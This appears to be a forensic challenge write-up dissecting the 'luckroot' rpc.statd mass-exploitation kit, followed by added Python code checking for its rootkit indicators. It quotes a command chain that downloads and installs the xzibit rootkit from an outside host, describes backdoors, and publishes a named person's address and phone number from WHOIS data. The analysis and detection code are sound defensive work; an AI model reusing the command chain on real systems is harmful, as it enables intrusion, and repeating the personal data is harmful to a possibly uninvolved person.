wait3r@the-pentagon.com 05/02/01@10.30a

Contents of LUCKROOT.TAR (gzip compressed, tar archive):

  luckroot/
  luckroot/luckstatdx.c
  luckroot/luckgo
  luckroot/luckscan-a.c
  luckroot/luckscan-a
  luckroot/luckstatdx

1. What is the blackhat attempting to do with his command line syntax?

He retrieves the blackhat tool from the website where it is hosted, using the ISC web client 'lynx' (http://lynx.isc.org). He then tries to extract the compressed tar file, succeeding on the 4th attempt. The blackhat then runs his tool with two parameters, the first being the first octet of the IP address and the second of course being the second octet, indicating that it should scan only a Class B subnet.

2. What does the tool accomplish?

It attempts to 'mass exploit' servers through the rpc.statd vulnerability, and then (attempts to) install a rootkit on each successful compromise.

3. How does the tool work?

The blackhat provides up to 3 arguments (and a minimum of 1) to the modified shell script (from VetesScan) called "luckgo". luckscan-a is then called using those arguments. luckscan-a is a slightly modified version of Volatile's pscan-a.c, a non-blocking TCP scanner. When the modified pscan detects a machine with an open 111/tcp port, it blindly runs a (again slightly modified) copy of ron1n's statdx (luckstatdx) against the machine. Provided the remote machine is actually running rpc.statd on Linux/x86 and is vulnerable, the exploit issues the following commands:

  cd /; uname -a; id; wget -nd http://www.becys.org/xzibit.tar.gz; tar -zxvf xzibit.tar.gz; cd lamerk; ./install; cd /; rm -rf lamerk xzibit.tar.gz

xzibit.tar.gz is the rootkit, which contains:

  lamerk/
  lamerk/ifconfig
  lamerk/linsniffer
  lamerk/logclear
  lamerk/netstat
  lamerk/ps
  lamerk/sense
  lamerk/sl2
  lamerk/top
  lamerk/s
  lamerk/install
  lamerk/sshdu
  lamerk/ssh_host_key
  lamerk/ssh_random_seed
  lamerk/hdparm
  lamerk/becys.cgi

  linsniffer/ifconfig/netstat/ps/top are all lrk[34] (libc5) binaries.
  install is the shell install script.
  hdparm is the sniffer startup script.
  sshdu is a trojaned sshd 1.2.27, configured to run on port 6969.
  becys.cgi is a trojaned cgi which allows the user to run shell commands as the uid of the webserver.
  sense (perl script) formats the output of tcp.log (the sniffer log).
  sl2 is slice, a denial of service tool (SYN flooder).

4. Is this tool a worm, or would you classify it as something else?

Nope, it's a hacked-together mass exploitation tool. Not a worm, since it doesn't propagate.

5. Is this tool original, or is it simply based on previous tools? If based on previous tools, which ones and what is modified?

Far from it. The tool kit:

  luckgo = shell script from VetesScan.
  luckscan-a.c = pscan-a.c by Volatile.
  luckstatdx.c = statdx.c by ron1n.

Nothing new.

Bonus Question: What information can you obtain about who is using or created the tool?

From the "ssh_host_key" (in the rootkit), the owner seemed to be root@localhost.localdomain, shame.

From the "install" script (in the rootkit), you can see the addresses which the blackhat wants to keep hidden:

  193.231.139.*  (ROEDUNET-LICEE1) Allocated to ROEDUNET connected high schools; RO
  213.154.137.*  (RO-PCNET-20000128) PCNET Data Network - ISP in Romania; PROVIDER; RO
  193.254.34.*
    193.254.34.0   - 193.254.34.15   (FININVNET) FININVEST; RO
    193.254.34.16  - 193.254.34.31   (LOGICNET) LOGIC NET; GALATI - 1st Modem Pool; RO
    193.254.34.48  - 193.254.34.63   (SSICTCEGL) SSI CTCE Galati; RO
    193.254.34.64  - 193.254.34.79   (LOGICNET) LOGIC NET; TIMISOARA - 1st Modem Pool; RO
    193.254.34.80  - 193.254.34.87   (LOGICNET) LOGIC NET; ARGES - 1st Modem Pool; RO
    193.254.34.96  - 193.254.34.127  (MICROINFO) Microinformatica S.A. Cluj; RO
    193.254.34.128 - 193.254.34.135  (LOGICNET) LOGIC NET; HUNEDOARA - 1st Modem Pool; RO
    193.254.34.136 - 193.254.34.143  (LOGICNET) LOGIC NET; Caras-Severin - 1st Modem Pool; RO
    193.254.34.144 - 193.254.34.152  (LOGICNET) LOGIC NET; Bistrita-Nasaud - 1st Modem Pool; RO
    193.254.34.160 - 193.254.34.175  (CONSUL) Consul-Deva; RO
    193.254.34.192 - 193.254.34.207  (LOGICNET) LOGIC NET; SICO CRAIOVA - Modem Pool; RO
    193.254.34.240 - 193.254.34.255  (SICO) SICO-CRAIOVA LAN; RO

A quick search on Google.com revealed something interesting: http://www.rdsnet.ro/rds-bin/publicitate_detaliu?anunttype_id=1 (scroll down to the post from 19-Oct-2000). Kind of looks like a phone number (093837243), eh? My Romanian isn't great, but it looks like he's trying to sell a car (or something). It also seems that [s]he posted to http://www.extrem.ro, indicating [s]he is/was located in Bucharest. I guess the page expired, since there was no information on the actual page which lycos.com had turned up (http://www.extrem.ro/msg1.htm).

This version seems to have been modified by "becys@becys.org", as that is who the rootkit is owned by (it sends mail to that address).

Administrative Contact:
  Qian Wang  becys@yahoo.com
  bSoft
  1 Hensel Dr. Apt.#Z1F
  College Station, Texas 77840
  US
  Phone- (979)862-9233

Carded I guess.. Cya.
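The analysis above gives a defender three concrete things to look for on a suspected victim: the lamerk/ layout of the xzibit.tar.gz archive, the post-exploitation command chain the modified statdx issues, and the trojaned sshd listening on 6969/tcp. The following script is an added example written for this write-up, not code from the submission or from the luckroot kit; it turns those three indicators into checks and runs them over constructed sample inputs (a tar member listing, the quoted command line, and a few lines in the format of Linux `netstat -an`). The netstat line format is an assumption about the input, and the checks match only what the analysis names; they are not a general rootkit scanner.

```python
"""Indicator checks for the luckroot / xzibit ("lamerk") rootkit.

Added example for this analysis; the sample inputs are constructed.
"""
import re
from dataclasses import dataclass, field

# Indicators taken from the analysis: rootkit members, dropper host/archive,
# staging directory and the port of the trojaned sshd.
LAMERK_FILES = {
    "ifconfig", "linsniffer", "logclear", "netstat", "ps", "sense", "sl2",
    "top", "s", "install", "sshdu", "ssh_host_key", "ssh_random_seed",
    "hdparm", "becys.cgi",
}
DROPPER_HOST = "www.becys.org"
DROPPER_ARCHIVE = "xzibit.tar.gz"
STAGING_DIR = "lamerk"
TROJAN_SSHD_PORT = 6969

# Constructed sample inputs (not captured data).
SAMPLE_TAR_LISTING = ["lamerk/", "lamerk/ifconfig", "lamerk/sshdu", "lamerk/becys.cgi"]
SAMPLE_COMMAND = ("cd /; uname -a; id; wget -nd http://www.becys.org/xzibit.tar.gz; "
                  "tar -zxvf xzibit.tar.gz; cd lamerk; ./install; cd /; "
                  "rm -rf lamerk xzibit.tar.gz")
SAMPLE_NETSTAT = [
    "Proto Recv-Q Send-Q Local Address Foreign Address State",
    "tcp 0 0 0.0.0.0:22 0.0.0.0:* LISTEN",
    "tcp 0 0 0.0.0.0:6969 0.0.0.0:* LISTEN",
]


@dataclass
class Findings:
    archive_members: list = field(default_factory=list)
    command_hits: list = field(default_factory=list)
    trojan_sshd_listening: bool = False

    def is_compromised(self):
        return bool(self.archive_members or self.command_hits
                    or self.trojan_sshd_listening)


def check_tar_listing(members):
    """Return tar members that match the rootkit layout lamerk/<known name>."""
    hits = []
    for m in members:
        head, _, tail = m.strip().partition("/")
        if head == STAGING_DIR and tail in LAMERK_FILES:
            hits.append(m.strip())
    return hits


def check_command_line(cmd):
    """Return the names of the post-exploitation steps present in a command string.

    Each pattern covers one step of the chain quoted in the analysis: fetch the
    archive, unpack it, run the installer, remove the evidence.
    """
    patterns = {
        "fetch_dropper": rf"wget\s+.*{re.escape(DROPPER_HOST)}/{re.escape(DROPPER_ARCHIVE)}",
        "unpack_dropper": rf"tar\s+-?z?x\S*\s+{re.escape(DROPPER_ARCHIVE)}",
        "run_installer": rf"cd\s+{STAGING_DIR}\s*;\s*\./install",
        "cleanup": rf"rm\s+-rf\s+{STAGING_DIR}\s+{re.escape(DROPPER_ARCHIVE)}",
    }
    return [name for name, pat in patterns.items() if re.search(pat, cmd)]


def check_listeners(netstat_lines):
    """True if a TCP socket is listening on the trojaned sshd port.

    Assumes 'netstat -an' style lines: proto recv-q send-q local foreign state.
    """
    for line in netstat_lines:
        fields = line.split()
        if len(fields) < 6 or fields[0] != "tcp" or fields[5] != "LISTEN":
            continue
        if fields[3].rsplit(":", 1)[-1] == str(TROJAN_SSHD_PORT):
            return True
    return False


def assess(members, cmd, netstat_lines):
    """Run all three checks and collect the results."""
    return Findings(
        archive_members=check_tar_listing(members),
        command_hits=check_command_line(cmd),
        trojan_sshd_listening=check_listeners(netstat_lines),
    )


if __name__ == "__main__":
    print(assess(SAMPLE_TAR_LISTING, SAMPLE_COMMAND, SAMPLE_NETSTAT))
```

One caveat that follows directly from the analysis: the rootkit replaces netstat, ps and ifconfig with lrk binaries that hide the attacker's addresses and processes, so `check_listeners` is only meaningful on output from a trusted binary (for example one run from read-only media) or on a port listing taken from the network side rather than from the suspected host itself.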